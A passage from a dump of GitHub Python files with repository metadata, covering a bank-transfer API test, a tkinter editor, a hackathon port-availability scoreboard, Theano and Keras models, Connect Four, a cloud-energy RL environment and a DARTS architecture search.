)\n\nmimetype = 'application/json'\nheaders = {\n 'Content-Type': mimetype,\n 'Accept': mimetype\n }\ndata = {\n 'from': '1234567890F',\n 'to': '3333333333A',\n 'amount': 321.00\n }\n\n@mock.patch('bankaccount.usecases.transfer_usecases.TransferAmountUseCase')\ndef test_post_transfer(mock_usecase, client):\n mock_usecase().execute.return_value = resp.ResponseSuccess(test_trs)\n http_response = client.post('/transfer', data=json.dumps(data), headers=headers)\n\n assert http_response.status_code == 200\n assert http_response.mimetype == 'application/json'\n\n\n@mock.patch('bankaccount.usecases.transfer_usecases.TransferAmountUseCase')\ndef test_post_transfer_failure(mock_usecase, client):\n mock_usecase().execute.return_value = resp.ResponseFailure.build_system_error('test error message')\n http_response = client.post('/transfer', data=json.dumps(data), headers=headers)\n\n assert json.loads(http_response.data.decode('UTF-8')) == {'type': resp.ResponseFailure.SYSTEM_ERROR, \n 'message': 'test error message'}\n assert http_response.status_code == 500\n assert http_response.mimetype == 'application/json'\n","repo_name":"youarhache/BankAccountKata","sub_path":"tests/adapters/test_post_transfer.py","file_name":"test_post_transfer.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25757129665","text":"from tkinter import ttk\r\nimport tkinter as tk\r\n\r\nclass InputFrame(tk.Frame) :\r\n def __init__(self, parent, root, *args, **kwargs) :\r\n super().__init__(parent, *args, **kwargs)\r\n\r\n self.root = root\r\n\r\n self.columnconfigure(0, weight=1)\r\n self.rowconfigure(0, weight=1)\r\n \r\n self.isFirst = True\r\n\r\n self.style = ttk.Style()\r\n\r\n self.inputArea = tk.Text(self, height=10, width=25, wrap=\"word\", font=(\"Cambiria\", 12, \"bold\"), foreground=\"black\", background=\"gray86\", selectbackground=\"black\", selectforeground=\"yellow\")\r\n self.inputArea.grid(row=0, column=0, sticky=\"nsew\")\r\n self.inputArea.focus_force()\r\n\r\n areaScrollBarY = ttk.Scrollbar(self, orient=\"vertical\", command=self.inputArea.yview)\r\n areaScrollBarY.grid(row=0, column=1, sticky=\"nsew\")\r\n\r\n self.inputArea.config(yscrollcommand=areaScrollBarY.set)\r\n\r\n self.inputArea.insert(tk.END, \"Enter the assembly code here\")\r\n self.inputArea.bind(\"\", self.clearTextContent)\r\n\r\n self.inputArea.bind(\"\", self.clearTextContent)\r\n \r\n def clearTextContent(self, *event) :\r\n self.inputArea.delete(\"1.0\", tk.END)\r\n self.inputArea.unbind(\"\")\r\n\r\n def saveAndCloseTextContent(self) :\r\n self.inputArea.config(state=\"disabled\")\r\n\r\n with open(\"data.txt\", 'w') as f:\r\n f.write(self.inputArea.get(\"1.0\", tk.END).rstrip())\r\n\r\n","repo_name":"yildizahmett/machine-simulation","sub_path":"gui_frames/inputFrame.py","file_name":"inputFrame.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35537299854","text":"from contextlib import closing\nimport socket\nimport random\nimport threading\n\n\nclass Scoreboard(object):\n\n ip_list = []\n ports = {\"FTP\": 21,\n \"SSH\": 22,\n \"SMTP\": 25,\n \"HTTP\": 80,\n \"Remote Desktop\": 445}\n update_interval = -1\n\n\n def __init__(self, update_interval):\n\n self.get_ips(\"./ips.txt\")\n self.update_interval = update_interval\n\n\n def get_ips(self, filepath):\n\n with open(filepath, \"r\") as f:\n\n self.ip_list = f.readlines()\n\n for i in range(0, len(self.ip_list)):\n\n self.ip_list[i] = self.ip_list[i].strip()\n\n\n def port_is_open(self, ip, port):\n\n with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:\n\n s.settimeout(3)\n\n if s.connect_ex((ip, port)) == 0:\n\n return True\n\n return False\n\n\n def check_ports(self):\n\n port_check = {}\n\n for ip in self.ip_list:\n\n port_check[ip] = {}\n\n for port in self.ports:\n\n port_check[ip][port] = self.port_is_open(ip, self.ports[port])\n\n\n return port_check\n\n\n def update(self, *args, **kwargs):\n\n offset = args[0]\n\n def update_wrapper(func):\n\n def run_func():\n\n delay = self.update_interval + random.randint(-1 * offset, offset)\n threading.Timer(delay, run_func).start()\n\n func()\n\n run_func()\n\n return func\n\n return update_wrapper\n","repo_name":"MatthewCS/suhackathon","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12618427230","text":"import theano\nimport theano.tensor as T\n\nimport matching_model\nimport ranking_model\nfrom utils import relu, tanh\n\n\ndef set_model(argv, emb, vocab):\n x = T.imatrix('x')\n y = T.ivector('y')\n l = T.iscalar('l')\n\n \"\"\" Set the classifier parameters\"\"\"\n window = argv.window\n opt = argv.opt\n lr = argv.lr\n init_emb = emb\n dim_emb = argv.dim_emb if emb is None else len(emb[0])\n dim_hidden = argv.dim_hidden\n n_vocab = vocab.size()\n L2_reg = argv.reg\n unit = argv.unit\n n_layers = argv.layer\n sim = argv.sim\n activation = relu if argv.activation == 'relu' else tanh\n\n if argv.task == 'binary':\n model = matching_model.Model(x=x, y=y, l=l, window=window, opt=opt, lr=lr,\n init_emb=init_emb, dim_emb=dim_emb, dim_hidden=dim_hidden,\n n_vocab=n_vocab, L2_reg=L2_reg, unit=unit, sim=sim,\n n_layers=n_layers, activation=activation)\n else:\n model = ranking_model.Model(x=x, y=y, l=l, window=window, opt=opt, lr=lr,\n init_emb=init_emb, dim_emb=dim_emb, dim_hidden=dim_hidden,\n n_vocab=n_vocab, L2_reg=L2_reg, unit=unit, sim=sim,\n n_layers=n_layers, activation=activation)\n return model\n\n\ndef set_train_f(model, dataset):\n # dataset = [x, y, l]\n # x=features: 1D: n_samples * n_words, 2D: window; elem=word id\n # y=labels: 1D: n_samples; elem=scalar\n # l=question length: 1D: n_samples * 2; elem=scalar\n # bb_x=batch indices for x: 1D: n_samples / batch_size + 1; elem=(bob, eob)\n # bb_y=batch indices for y: 1D: n_samples / batch_size + 1; elem=(bob, eob)\n\n index = T.iscalar('index')\n bob_x = T.iscalar('bob_x')\n eob_x = T.iscalar('eob_x')\n bob_y = T.iscalar('bob_y')\n eob_y = T.iscalar('eob_y')\n\n train_f = theano.function(inputs=[index, bob_x, eob_x, bob_y, eob_y],\n outputs=[model.correct, model.nll],\n updates=model.update,\n givens={\n model.tr_inputs[0]: dataset[0][bob_x: eob_x],\n model.tr_inputs[1]: dataset[1][bob_y: eob_y],\n model.tr_inputs[2]: dataset[2][index],\n }\n )\n return train_f\n\n\ndef set_predict_f(model, dataset):\n # dataset = [x, y, l]\n # x=features: 1D: n_samples * n_words, 2D: window; elem=word id\n # y=labels: 1D: n_samples; elem=scalar\n # l=question length: 1D: n_samples * 2; elem=scalar\n # bb_x=batch indices for x: 1D: n_samples / batch_size + 1; elem=(bob, eob)\n # bb_y=batch indices for y: 1D: n_samples / batch_size + 1; elem=(bob, eob)\n\n index = T.iscalar('index')\n bob_x = T.iscalar('bob_x')\n eob_x = T.iscalar('eob_x')\n bob_y = T.iscalar('bob_y')\n eob_y = T.iscalar('eob_y')\n\n predict_f = theano.function(inputs=[index, bob_x, eob_x, bob_y, eob_y],\n outputs=model.correct,\n givens={\n model.pr_inputs[0]: dataset[0][bob_x: eob_x],\n model.pr_inputs[1]: dataset[1][bob_y: eob_y],\n model.pr_inputs[2]: dataset[2][index],\n }\n )\n return predict_f\n","repo_name":"hiroki13/question-answering-system","sub_path":"retrieval-qa-system/model_builder.py","file_name":"model_builder.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"73877073006","text":"from array import *\n\n# KAMUS\n# X, i = int\n# found = bool\n# search = array[0:N]\n\n# ALGORITMA\n\nX = int(input(\"Masukan nilai X: \"))\n\n# definisi array\nsearch = array('i', [1,2,3,5,6])\n\n# definisi awal nilai\nfound = False\ni = 0\n\nwhile (found != True and i < len(search)):\n\tif(X < search[i]):\n\t\t# print(str(search[i]) + \" terdapat pada indeks ke-\" + str(i))\n\t\tfound = True\n\telse:\n\t\ti = i + 1\n\t\n# cetak hasil\t\nif (found == False):\n\tprint(\" Tidak ada yang lebih besar dari \" + str(X))\nelse:\n\tprint(str(search[i]) + \" terdapat pada indeks ke-\" + str(i))","repo_name":"daimessdn/py-incubator","sub_path":"exercise list (py)/gabut/SearchingArray2.py","file_name":"SearchingArray2.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4245947400","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom keras.datasets import mnist\ndataset = mnist.load_data('mymnist.db')\ntrain , test = dataset\nX_test , y_test = test\nX_train , y_train = train\nX_train_1d = X_train.reshape(-1 , 28*28)\nX_test_1d = X_test.reshape(-1 , 28*28)\nX_train_1d.shape\nX_train = X_train_1d.astype('float32')\nX_test = X_test_1d.astype('float32')\nfrom keras.utils.np_utils import to_categorical\ny_train_cat = to_categorical(y_train)\ny_test_cat=to_categorical(y_test)\ny_train_cat\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nmodel = Sequential()\nmodel.add(Dense(units=1000, input_dim=28*28, activation='relu'))\nmodel.summary()\nmodel.add(Dense(units=515, activation='relu'))\nmodel.add(Dense(units=250, activation='relu'))\nmodel.add(Dense(units=100, activation='relu'))\nmodel.summary()\nmodel.add(Dense(units=10, activation='softmax'))\nfrom keras.optimizers import RMSprop\nmodel.compile(optimizer=RMSprop(), loss='categorical_crossentropy', \n metrics=['accuracy']\n )\nh = model.fit(X_train, y_train_cat,epochs=3)\nprint(h.history['accuracy'][-1])\nwith open(\"/mlops2/accuracy.text\",\"+w\") as f3:\n f3.write(h.history['accuracy'][-1])\n\n\n\n\n","repo_name":"Hritickgoyal524/Task3MnistDataset","sub_path":"Mytask3final.py","file_name":"Mytask3final.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18723091621","text":"from graphics import *\n\n\nclass Board:\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n W = self.width\n H = self.height\n self.data = [ [' '] * W for row in range(H) ] \n \n \n def __repr__(self):\n H = self.height\n W = self.width\n s = ''\n for row in range(0, H):\n s += '|' \n for col in range(0, W):\n s += self.data[row][col] + '|'\n s += '\\n'\n\n s += (2 * W + 1) * '-'\n \n s += '\\n'\n \n for col in range(0,W):\n if col >= 10:\n col = col % 10\n s += ' ' + str(col)\n \n return s\n \n \n def addMove(self, col, ox):\n row = self.height - 1\n \n while row >= 0:\n if self.data[row][col] == ' ':\n \n if ox is 'O':\n self.graphical_data[row][col].setFill(\"blue\")\n self.graphical_data[row][col].setOutline(\"blue\")\n else:\n self.graphical_data[row][col].setFill(\"red\")\n self.graphical_data[row][col].setOutline(\"red\")\n \n self.data[row][col] = ox\n break\n else:\n row -= 1\n \n \n def clear(self):\n W = self.width\n H = self.height\n self.data = [ [' '] * W for row in range(H) ]\n \n \n def setBoard(self, moveString):\n nextCh = 'X'\n for colString in moveString:\n col = int(colString)\n if 0 <= col <= self.width - 1:\n self.addMove(col, nextCh)\n if nextCh == 'X': nextCh = 'O'\n else: nextCh = 'X'\n \n \n def allowsMove(self, c):\n H = self.height\n W = self.width\n D = self.data\n \n if c < 0 or c > W - 1:\n return False\n \n for row in range(0, H):\n if D[row][c] == ' ':\n return True\n \n return False\n \n \n def isFull(self):\n W = self.width\n isAllows = False\n \n for col in range(0, W):\n isAllows = self.allowsMove(col)\n if isAllows == True:\n return False\n \n return True\n \n \n def delMove(self, c):\n H = self.height\n row = 0\n \n while row < H:\n if self.data[row][c] != ' ':\n self.data[row][c] = ' '\n break\n else:\n row += 1\n \n \n def winsFor(self, ox):\n H = self.height\n W = self.width\n D = self.data\n \n #horizontal check\n for row in range(0, H):\n for col in range(0, W - 3):\n if D[row][col] == ox and \\\n D[row][col + 1] == ox and \\\n D[row][col + 2] == ox and \\\n D[row][col + 3] == ox:\n return True\n \n #vertical check \n for row in range(0, H - 3):\n for col in range(0, W):\n if D[row][col] == ox and \\\n D[row + 1][col] == ox and \\\n D[row + 2][col] == ox and \\\n D[row + 3][col] == ox:\n return True \n \n #diagonal leftDown to rightUp check \n for row in range(0, H - 3):\n for col in range(3, W):\n if D[row][col] == ox and \\\n D[row + 1][col - 1] == ox and \\\n D[row + 2][col - 2] == ox and \\\n D[row + 3][col - 3] == ox:\n return True\n \n #diagonal leftUp to rightDown check \n for row in range(0, H - 3):\n for col in range(0, W - 3):\n if D[row][col] == ox and \\\n D[row + 1][col + 1] == ox and \\\n D[row + 2][col + 2] == ox and \\\n D[row + 3][col + 3] == ox:\n return True\n \n return False\n \n\n def hostGame(self):\n print(\"Welcome to Connect Four!\\n\")\n print(self)\n \n self.initGraphicBoard(self.width, self.height) \n \n isWins = False\n checker = 'X'\n \n while self.isFull() == False: \n print(\"\\n\" + checker + \"'s choice: \"), \n users_col = self.getSelectedCol(self.win.getMouse().getX())\n print(str(users_col) + \"\\n\")\n #users_col = input(\"\\n\" + checker + \"'s choice: \")\n \n if self.allowsMove(users_col) == False:\n #print(\"Out of range. Points must be re-entered.\\n\")\n continue\n \n self.addMove(users_col, checker) \n \n isWins = self.winsFor(checker)\n if isWins == True:\n self.win.close()\n print(\"\\n\" + checker + \" wins -- Congratulations!\\n\")\n print(self)\n return\n \n print(self)\n \n checker = self.changeChecker(checker)\n \n self.win.close()\n print(\"\\nDraw Game!\\n\")\n print(self)\n \n \n def initGraphicBoard(self, W, H):\n self.diameter = 60\n self.radius = self.diameter / 2\n diameter = self.diameter\n radius = self.radius\n self.win = GraphWin( \"Connect Four\", (diameter * W) + diameter, (diameter * H) + diameter )\n self.win.setBackground(color_rgb(255,161,51))\n self.graphical_data = []\n for row in range(H):\n new_row = []\n for col in range(W):\n center = Point(diameter + (diameter * col), diameter + (diameter * row))\n circle = Circle(center, radius - 2)\n circle.setFill(color_rgb(204,204,204))\n circle.setOutline(color_rgb(204,204,204))\n circle.draw(self.win)\n new_row += [circle]\n self.graphical_data += [new_row]\n \n \n def getSelectedCol(self, pointX):\n diameter = self.diameter\n radius = self.radius\n width = self.width\n \n if pointX < radius:\n return -1\n \n if pointX > radius + (diameter * width):\n return width\n \n for devidedColumn in range(0, width):\n colCenterX = diameter + (diameter * devidedColumn)\n if colCenterX - radius <= pointX and pointX <= colCenterX + radius:\n return devidedColumn\n\n\n def changeChecker(self, nextChecker):\n if nextChecker == 'X':\n return 'O'\n else:\n return 'X'\n\n","repo_name":"gmanpark/connectfour","sub_path":"ConnectFour/Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11243100084","text":"import typer\n\nimport pfp_cli.enum as enum\nimport pfp_cli.scan as scan\n\napp = typer.Typer()\napp.add_typer(enum.app, name=\"enum\")\napp.add_typer(scan.app, name=\"scan\")\n\n\n__version__ = \"0.1.0\"\n\n\ndef version_callback(value: bool):\n if value:\n typer.echo(f\"PFP-CLI Version: {__version__}\")\n raise typer.Exit()\n\n\n@app.callback()\ndef main(version: bool = typer.Option(None, \"-v\", \"--version\", \ncallback=version_callback, is_eager=True, help=\"Show current version of pfp-cli\")):\n return\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"H3r1CH/pfp-cli","sub_path":"pfp_cli/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"11478079653","text":"import sys\r\n\r\nfrom env_energy import *\r\nfrom env_traffic import *\r\nfrom performanceCalculator import *\r\n\r\n\r\nclass CloudEnvironment:\r\n time_machine = None\r\n battery = [None for x in range(N_OF_CLOUD)]\r\n CREATE_INPUT_DATA = False\r\n\r\n def __init__(self, city, traffic_rate):\r\n # ----- DEBUG\r\n # self.debug_reward_per_urf = [0 for x in range(4)]\r\n # self.debug_count_per_urf = [0 for x in range(4)]\r\n # ----- DEBUG\r\n self.time_machine = TimeMachine.get_instance()\r\n self.du_load_in_cc = 0\r\n self.number_of_ue = NUMBER_OF_UE_PER_EC * N_OF_EC # Total Number of User\r\n self.r_ec = range(N_OF_EC)\r\n self.traffic_load = None # we will get these given data from folder input/given_data\r\n self.solar_energy = None\r\n self.cost_avg = [0 for x in range(N_OF_CLOUD)]\r\n self.ren_en_avg = [0 for x in range(N_OF_CLOUD)]\r\n self.unstored_en_avg = [0 for x in range(N_OF_CLOUD)]\r\n if self.CREATE_INPUT_DATA:\r\n city_list = ['stockholm', 'cairo', 'jakarta']\r\n for c in city_list:\r\n self.create_and_save_solar_energy(c)\r\n # Traffic.create_and_save_traffic(1)\r\n sys.exit()\r\n\r\n self.load_data(traffic_rate, city)\r\n\r\n self.current_trafic_load = np.array([0 for x in range(N_OF_EC)])\r\n self.current_remaining_energy = np.array([0 for x in range(N_OF_CLOUD)])\r\n self.current_time = np.array(0)\r\n ACTION_NUMBER_OF_URF_LIST = [0, 1, 2, 3]\r\n self.number_of_active_urf = np.array(\r\n [[0 for x in range(len(ACTION_NUMBER_OF_URF_LIST))] for x in range(N_OF_EC)])\r\n self.renewable_energy_ratio = np.array([[0 for x in range(2)] for x in range(N_OF_CLOUD)])\r\n self.state_space_size = self.current_trafic_load.size + self.current_remaining_energy.size + self.current_time.size\r\n self.action_space_size = self.number_of_active_urf.size * self.renewable_energy_ratio.size\r\n\r\n def get_renewable_energy_ratio(self, action):\r\n return self.renewable_energy_ratio[action % self.renewable_energy_ratio.size]\r\n\r\n def get_number_of_active_urf(self, action):\r\n return self.number_of_active_urf[int(np.floor(action / self.renewable_energy_ratio.size))]\r\n\r\n def disaggr_action(self, action):\r\n self.number_of_active_urf = self.get_number_of_active_urf(action)\r\n self.renewable_energy_ratio = self.get_renewable_energy_ratio(action)\r\n return self.renewable_energy_ratio, self.number_of_active_urf\r\n\r\n def close(self):\r\n Event('print performance results', 'test')\r\n pass\r\n\r\n def create_and_save_solar_energy(self, city_name):\r\n snapshot = Snapshot()\r\n snapshot.set_solar_data_path(city_name)\r\n solar_energy = SolarEnergy(city_name) # connecting the battery to the solar panel\r\n snapshot.save_solar_energy(solar_energy)\r\n print(\"solar energy is saved in a file.\")\r\n\r\n\r\n # Loading Traffic and Solar Energy\r\n def load_data(self, traffic_rate, city):\r\n # LOAD TRAFFIC\r\n snapshot = Snapshot()\r\n snapshot.set_traffic_data_path(1) # always 1, we change the traffic rate after loading the generated one\r\n self.traffic_load = snapshot.load_tr()\r\n self.traffic_load = self.traffic_load * traffic_rate\r\n # Traffic.plt_traffic_in_a_year_period(self.traffic_load[0][0])\r\n snapshot.set_solar_data_path(city)\r\n self.solar_energy = snapshot.load_solar_energy()\r\n if AVERAGE_GIVEN_DATA:\r\n self.traffic_load = Traffic.get_average_traffic(self.traffic_load)\r\n\r\n def step_dqn(self, number_of_active_urf, renewable_energy_ratio):\r\n # s_{t} calculate the load\r\n current_time_slot = self.time_machine.get_hour()\r\n the_day = self.time_machine.get_day_of_the_year()\r\n du_urllc_load = [0 for x in range(N_OF_EC)]\r\n du_embb_load = [0 for x in range(N_OF_EC)]\r\n du_load = [0 for x in range(N_OF_EC)]\r\n remaining_en = [0 for x in range(N_OF_CLOUD)]\r\n du_load_in_cc = 0\r\n for ec_index in range(N_OF_EC):\r\n du_urllc_load[ec_index] = self.traffic_load[ec_index][PacketType.URLLC][the_day][\r\n current_time_slot] * N_OF_URF\r\n du_embb_load[ec_index] = self.traffic_load[ec_index][PacketType.EMBB][the_day][\r\n current_time_slot] * number_of_active_urf[ec_index]\r\n du_load[ec_index] = du_urllc_load + du_embb_load\r\n du_load_in_cc += self.traffic_load[ec_index][PacketType.EMBB][the_day][current_time_slot] * (\r\n N_OF_URF - number_of_active_urf[ec_index])\r\n # s_{t} update the energy consumption\r\n remaining_en[ec_index] = self.battery[ec_index].battery_update(du_load, renewable_energy_ratio[ec_index])\r\n # s_{t} update the energy consumption\r\n remaining_en[CC_INDEX] = self.battery[ec_index].battery_update(du_load_in_cc, renewable_energy_ratio[CC_INDEX])\r\n\r\n # s_{t+1}\r\n next_time_slot = (current_time_slot + 1) % NUMBER_OF_TIME_SLOT_IN_ONE_DAY\r\n # s_{t+1} get the energy consumption according to battery updates\r\n cost = 0\r\n for i in range(N_OF_CLOUD):\r\n cost += self.battery[0].get_the_fossil_en_cons()\r\n reward = -cost\r\n # s_{t+1} get the traffic loads\r\n for ec_index in range(N_OF_EC):\r\n du_load[ec_index] = self.traffic_load[ec_index][PacketType.EMBB][next_time_slot]\r\n\r\n return remaining_en, du_load, next_time_slot, reward\r\n\r\n def step(self, number_of_active_urf, renewable_energy_ratio, ec_index):\r\n current_time_slot = self.time_machine.get_hour()\r\n the_day = self.time_machine.get_day_of_the_year()\r\n if ec_index == CC_INDEX:\r\n # print(\"cc_load:{}\".format(self.du_load_in_cc))\r\n remaining_en = self.battery[ec_index].battery_update(self.du_load_in_cc, renewable_energy_ratio)\r\n self.du_load_in_cc_diagnose = self.du_load_in_cc\r\n self.du_load_in_cc = 0\r\n else: # EC\r\n if AVERAGE_GIVEN_DATA:\r\n du_urllc_load = self.traffic_load[ec_index][PacketType.URLLC][current_time_slot] * N_OF_URF\r\n du_urllc_load = 0 # fixme: remove this line\r\n du_embb_load = self.traffic_load[ec_index][PacketType.EMBB][current_time_slot] * number_of_active_urf\r\n self.du_load_in_cc += self.traffic_load[ec_index][PacketType.EMBB][current_time_slot] * (\r\n N_OF_URF - number_of_active_urf)\r\n else:\r\n du_urllc_load = self.traffic_load[ec_index][PacketType.URLLC][the_day][current_time_slot] * N_OF_URF\r\n du_embb_load = self.traffic_load[ec_index][PacketType.EMBB][the_day][\r\n current_time_slot] * number_of_active_urf\r\n self.du_load_in_cc += self.traffic_load[ec_index][PacketType.EMBB][the_day][current_time_slot] * (\r\n N_OF_URF - number_of_active_urf)\r\n du_load = du_urllc_load + du_embb_load\r\n # print(\"ec_load:{}\".format(du_load))\r\n remaining_en = self.battery[ec_index].battery_update(du_load, renewable_energy_ratio)\r\n\r\n # print(\"ec_index:{} number_of_active_urf:{}\".format(ec_index, number_of_active_urf))\r\n self.cost_avg[ec_index], self.unstored_en_avg[ec_index] = self.battery[\r\n ec_index].get_the_last_24_hour_consumptions()\r\n total_cost = 0\r\n ren_en_avg = 0\r\n for i in range(N_OF_CLOUD):\r\n # print(\"i:{} cost:{}\".format(i, self.cost_avg[i]))\r\n if i == CC_INDEX:\r\n total_cost += self.cost_avg[i]\r\n ren_en_avg += self.ren_en_avg[i]\r\n # reward = -(cost_avg / 1000.0) + (ren_en_avg / 200.0)\r\n # if self.unstored_en_avg[ec_index] > 0:\r\n # print(\"debuggging\")\r\n # reward = (total_cost / REWARD_NORMALIZER)\r\n UNSTORED_EN_WEIGHTING_FACTOR = 5\r\n # reward = (total_cost + self.unstored_en_avg[ec_index] * UNSTORED_EN_WEIGHTING_FACTOR) / REWARD_NORMALIZER\r\n # reward = total_cost / REWARD_NORMALIZER\r\n reward = -total_cost\r\n next_time_slot = (current_time_slot + 1) % NUMBER_OF_TIME_SLOT_IN_ONE_DAY\r\n if AVERAGE_GIVEN_DATA:\r\n if ec_index == CC_INDEX:\r\n load = 0\r\n for i in range(N_OF_EC):\r\n load += self.traffic_load[i][PacketType.EMBB][next_time_slot]\r\n traffic_load = load / N_OF_EC\r\n else:\r\n traffic_load = self.traffic_load[ec_index][PacketType.EMBB][next_time_slot]\r\n else:\r\n if ec_index == CC_INDEX:\r\n load = 0\r\n for i in range(N_OF_EC):\r\n load += self.traffic_load[i][PacketType.EMBB][the_day][next_time_slot]\r\n traffic_load = load / N_OF_EC\r\n else:\r\n traffic_load = self.traffic_load[ec_index][PacketType.EMBB][the_day][next_time_slot]\r\n # ----- DEBUG\r\n # print(\"number_of_active_urf:{} ec_index:{} reward:{}\".format(number_of_active_urf, ec_index, reward))\r\n # if number_of_active_urf != None:\r\n # self.debug_reward_per_urf[number_of_active_urf] += reward\r\n # self.debug_count_per_urf[number_of_active_urf] += 1\r\n # ----- DEBUG\r\n return remaining_en, next_time_slot, traffic_load, reward\r\n\r\n def calculate_one_year_obj_func(self):\r\n total_cost = 0\r\n for cloud_index in range(N_OF_CLOUD):\r\n for rec in self.battery[cloud_index].fm.history:\r\n hour_of_the_day = rec[1]\r\n fossil_energy_consumption = rec[3]\r\n total_cost += fossil_energy_consumption * PowerCons.ELEC_PRICE[hour_of_the_day]\r\n return total_cost\r\n\r\n def reset(self, sp, batt):\r\n self.time_machine.reset_the_time_machine()\r\n # solar_energy, panel_size, max_battery_energy, cloud_type):\r\n for ec_index in self.r_ec:\r\n self.battery[ec_index] = Battery(self.solar_energy, sp, batt, CloudType.edge)\r\n self.battery[CC_INDEX] = Battery(self.solar_energy, sp * PowerCons.CC_SIZING_MULTIPLIER,\r\n batt * PowerCons.CC_SIZING_MULTIPLIER, CloudType.center)\r\n self.current_trafic_load = np.array([0 for x in range(N_OF_EC)])\r\n self.current_remaining_energy = np.array([0 for x in range(N_OF_CLOUD)])\r\n self.du_load_in_cc = 0\r\n self.cost_avg = [0 for x in range(N_OF_CLOUD)]\r\n self.ren_en_avg = [0 for x in range(N_OF_CLOUD)]\r\n current_time_slot = self.time_machine.get_hour()\r\n traffic_load = 0\r\n return self.current_remaining_energy, self.current_trafic_load, current_time_slot\r\n","repo_name":"TurgayPamuklu/DeepRAN","sub_path":"grove/env_top.py","file_name":"env_top.py","file_ext":"py","file_size_in_byte":10861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25986909557","text":"from ex108 import moeda\r\n\r\nfor i in range(0,4):\r\n print()\r\n print(\"*\"*30)\r\n valor = int(input(\"Introduza um número: \"))\r\n soma = moeda.aumentar(valor,10)\r\n subtr = moeda.diminuir(valor,15)\r\n mult = moeda.dobro(valor)\r\n div = moeda.metade(valor)\r\n print(\"*\"*30)\r\n print(f\"Aumentando 10% é {moeda.dinh(soma)}\\n\\nDiminuindo 15% é {moeda.dinh(subtr)}\\n\\nA multiplicação do valor é {moeda.dinh(mult)}\\n\\nA divisão do valor é {moeda.dinh(div)}\")","repo_name":"joaoricard0/PythonExercises","sub_path":"Desafio108/Desafio108.py","file_name":"Desafio108.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32741147170","text":"# https://github.com/tinhb92/rnn_darts_fastai/blob/master/train_search.py\n\nfrom fastai import *\nfrom fastai.text import *\nfrom train import DartsCell, DartsRnn\nfrom copy import deepcopy as dc\nimport copy\nfrom darts_callbacks import Genotype\n\nSTEPS = 8\nCONCAT = 8\nedges_cnt = sum(i for i in range(1, STEPS+1))\n\nPRIMITIVES = [\n 'none',\n 'tanh',\n 'relu',\n 'sigmoid',\n 'identity'\n]\n\nclass DartsCellSearch(DartsCell):\n \n def __init__(self, ninp, nhid, \n dropouth, dropoutx, initrange):\n super(DartsCellSearch, self).__init__(ninp, nhid, dropouth, \n dropoutx, initrange, genotype=None)\n self.arch_p = torch.rand((edges_cnt, len(PRIMITIVES)), device=\"cuda\").mul_(1e-3)\n self.arch_p.requires_grad = True\n self.bn = nn.BatchNorm1d(nhid, affine=False) \n\n def cell(self, x, h_prev, x_mask, h_mask):\n s0 = self._compute_init_state(x, h_prev, x_mask, h_mask)\n s0 = self.bn(s0)\n probs = F.softmax(self.arch_p, dim=-1)\n\n offset = 0\n states = s0.unsqueeze(0)\n for i in range(STEPS):\n if self.training:\n masked_states = states * h_mask.unsqueeze(0)\n else:\n masked_states = states\n ch = masked_states.view(-1, self.nhid).mm(self._Ws[i]).view(i+1, -1, 2*self.nhid) \n c, h = torch.split(ch, self.nhid, dim=-1)\n c = c.sigmoid()\n\n s = torch.zeros_like(s0)\n for k, name in enumerate(PRIMITIVES):\n if name == 'none': continue\n fn = self._get_activation(name)\n unweighted = states + c * (fn(h) - states)\n s += torch.sum(probs[offset:offset+i+1, k].unsqueeze(-1).unsqueeze(-1) * unweighted, dim=0)\n s = self.bn(s)\n states = torch.cat([states, s.unsqueeze(0)], 0)\n offset += i+1\n \n cell_out = torch.mean(states[-CONCAT:], dim=0)\n return cell_out \n \n \nclass DartsRnnSearch(DartsRnn):\n \n def __init__(self, emb_sz, vocab_sz, \n ninp, nhid, \n dropout,\n dropouth, dropoutx, \n dropouti, dropoute,\n bs_train, bs_val, bs_test=1):\n super(DartsRnnSearch, self).__init__(emb_sz, vocab_sz,\n ninp, nhid, \n dropout,\n dropouth, dropoutx, \n dropouti, dropoute, \n bs_train, bs_val, bs_test,\n cell_cls=DartsCellSearch, \n genotype=None)\n \n def genotype_parse(self):\n def _parse(probs):\n gene = []\n start = 0\n for i in range(STEPS):\n end = start + i + 1\n W = probs[start:end].copy()\n j = sorted(range(i + 1), key=lambda x: -max(W[x][k] for k in range(len(W[x])) \\\n if k != PRIMITIVES.index('none')))[0]\n k_best = None\n for k in range(len(W[j])):\n if k != PRIMITIVES.index('none'):\n if k_best is None or W[j][k] > W[j][k_best]:\n k_best = k\n gene.append((PRIMITIVES[k_best], j))\n start = end\n return gene\n \n with torch.no_grad():\n gene = _parse(F.softmax(self.rnn.arch_p, dim=-1).cpu().numpy())\n genotype = Genotype(recurrent=gene, concat=range(STEPS+1)[-CONCAT:])\n return genotype \n \n \nclass ArchParamUpdate(LearnerCallback):\n \n def __init__(self, learn:Learner, search_dat, \n arch_lr, arch_wdecay, wdecay): \n 